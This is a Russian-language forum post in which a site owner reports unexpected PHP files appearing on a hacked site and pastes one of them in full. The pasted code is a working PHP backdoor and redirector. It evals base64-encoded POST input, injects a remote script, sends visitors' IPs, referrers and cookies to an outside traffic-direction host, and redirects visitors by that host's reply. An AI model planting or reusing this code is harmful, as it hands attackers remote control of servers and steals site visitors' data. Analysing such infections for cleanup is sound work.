Babai,
Знаю) Я сайт для мобилы и делал.
Посмотрел через ftp сайт и что-то там не так. Щас скину скриншот.
http://picsee.net/2011-10-30/ed4acaca8f58.png.html
Неужели пароль сбрутили?
С папками все нормально, а файлов *.php появилось много.
Вот содержание одного из них (они все почти одинаковы)
<?$tds="http://yourtraveldiary.net/portal/TDS.post.php";$tdsip=&quo
t;";$lin="http://fb.com";$esdid="1";$key="FDSSFG54
tg3DFSTyt45t";?><?//BREACK//?> global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt
_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000) 1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt
_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_PO
ST[$sessdt_p])));exit;} }
<?php
//ConfGui
error_reporting(0);
$mode=$_GET["mode"];if($mode=="config" AND $key==$_GET['key']){
echo '<form name="form1" method="post" action=http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME&
#039;].'?mode=setconfig&key='.$_GET['key'].'>
<table border="0"><tr><td>TDS</td><td><input type="text" name="ptds" value="'.$tds.'"></td><td>TDS IP</td>
<td><input type="text" name="ptdsip" value="'.$tdsip.'"></td><td>KEY</td><
;td><input type="text" name="pkey" value="'.$key.'"></td>
</tr><tr><td>Reserve</td><td><input type="text" name="pto" value="'.$lin.'"></td><td>ESD ID</td><td><input type="text" name="pesdid" value="'.$esdid.'"></td>
<td colspan="2"><input type="submit" name="Submit" value="ok"></td></tr></table></form>';
die();}if($mode=="setconfig" AND $key==$_GET['key']){
$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}
$getlpa=file($scr);
$strng=$getlpa[0];
$file=file($scr);
for($i=0;$i<sizeof($file);$i )
if($i==0) {
$ka='<?//BRE';$kaka=$ka.'ACK//?>';
$felp = explode($kaka, $file[$i]);
$file[$i]='<?$tds="'.$_POST["ptds"].'";$td
sip="'.$_POST["ptdsip"].'";$lin="'.$_POS
T["pto"].'";$esdid="'.$_POST["pesdid"].&
#039;";$key="'.$_POST["pkey"].'";?>'.
$kaka.$felp[1];
}
$fp=fopen($scr,"w");
fputs($fp,implode("",$file));
fclose($fp);
}
//send
if(empty($tdsip)){$dom = explode("/", $tds);$dom=$dom[2];}else{$dom=$tdsip;}
$fp = fsockopen($dom, 80, $errno, $errstr, 2);
if (!$fp) {$goto=$lin;} else {
$t_dom=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER[
039;SCRIPT_NAME']);
$t_ref=urlencode($_SERVER[HTTP_REFERER]);
$t_ip=urlencode($_SERVER["REMOTE_ADDR"]);
$t_prox='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$t_prox=
039;yes';}
$t_agent=urlencode($_SERVER['HTTP_USER_AGENT']);
foreach($_COOKIE as $key=>$val) {$t_cookie=$t_cookie."&".$key."=".$val;}$t_cookie=urlencode(
$t_cookie);
if(empty($t_cookie)){$t_cookie=urlencode($_SERVER['QUERY_STRING']);}
$out = "GET ".$tds."?dom=".$t_dom."&ref=".$t_ref."&ip=".$
t_ip."&prox=".$t_prox."&agent=".$t_agent."&cookie="
;.$t_cookie."&esdid=".$esdid." HTTP/1.0\r\n";
$out .= "Host: ".$dom."\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);
while (!feof($fp)) {$str=fgets($fp,128);if ($str=="\r\n" && empty($he)){$he = 'do';}if ($he=='do'){$goto.=$str;}}fclose ($fp);}$goto=substr($goto, 2);
$gotoe = explode("://", $goto);
If($gotoe[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$goto);}
If($gotoe[0]=='cook'){$gotoee=explode("&", $gotoe[1]);foreach($gotoee as $setcook){$set=explode("=", $setcook);setcookie($set[0], $set[1]);}}
If($gotoe[0]=='echo'){echo $gotoe[1];}
?>